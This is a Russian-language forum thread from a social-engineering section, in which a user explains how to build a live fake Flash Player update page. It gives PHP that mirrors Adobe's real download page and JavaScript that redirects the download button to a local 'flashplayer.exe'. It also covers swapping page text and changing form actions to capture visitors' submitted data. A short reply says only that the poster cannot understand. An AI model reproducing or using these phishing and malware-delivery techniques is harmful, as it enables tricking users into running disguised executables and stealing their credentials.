Загрузка...

Технология разработки фейков

Тема в разделе Социальная инженерия создана пользователем Pwoned 18 апр 2018. 282 просмотра

  1. Pwoned
    Pwoned Автор темы 18 апр 2018 1 18 апр 2018
    Впервые тема была мной размещена на эксплойте 6.07.2017, здесь же решил разместить её позднее.



    Информация может и не новая для кого либо, но я давно был заинтересован подобной подделкой.

    Сменилась информация на основном сайте ? - Меняется информация и на нашем фейке.



    Хотим сделать фейк обновления Flash Player, пишем следующий код:

    Код
    <?php



    $flash = file_get_contents ('https://get.adobe.com/flashplayer/'); //получаем страницу офф.сайта

    echo $flash;



    ?>



    <script type="text/javascript">

    document.getElementById("buttonDownload").href="flashplayer.exe";

    </script>


    До того как мы заюзали js, наша кнопка для скачивания плеера имела совсем другую ссылку, после того как мы использовали код который выше, ссылка на кнопке сменилась на "flashplayer.exe".

    Прошу заметить что наш фейк работает в режиме онлайн, функция file_get_contents парсит всю информацию с настоящего сайта, и только потом мы с помощью js меняем что нам нужно.



    Скриншот: [IMG]



    Тот же текст на нашей странице можно менять следующим методом:

    Код
    document.body.innerHTML = document.body.innerHTML.replace('Что нужно заменить', 'На что заменить');


    Скриншот: [IMG]



    Таким же макаром можно менять и action формы для вставки обработчика и получения чужих данных с формы.



    Что-то подобное:

    Код
    document.getElementById('form-id').attributes.action.value
     
    Этот материал оказался полезным?
    Вы можете отблагодарить автора темы путем перевода средств на баланс
    Отблагодарить автора
  2. KenKaneki_inactive216868
    KenKaneki_inactive216868 18 апр 2018 アレクサンドル イネイキン 211 26 ноя 2017
    что то на иностраном языке, не понимать
     
Загрузка...
Top